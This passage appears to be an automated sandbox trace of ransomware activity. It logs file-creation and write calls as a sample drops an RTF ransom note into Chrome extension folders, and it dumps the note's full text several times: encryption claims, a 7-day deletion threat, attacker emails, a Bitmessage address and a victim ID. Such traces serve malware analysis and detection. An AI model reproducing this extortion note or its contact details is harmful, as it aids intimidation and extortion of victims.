party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.495] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.496] CloseHandle (hObject=0x2f0) returned 1 [0286.496] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0286.496] GetLastError () returned 0x2 [0286.496] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 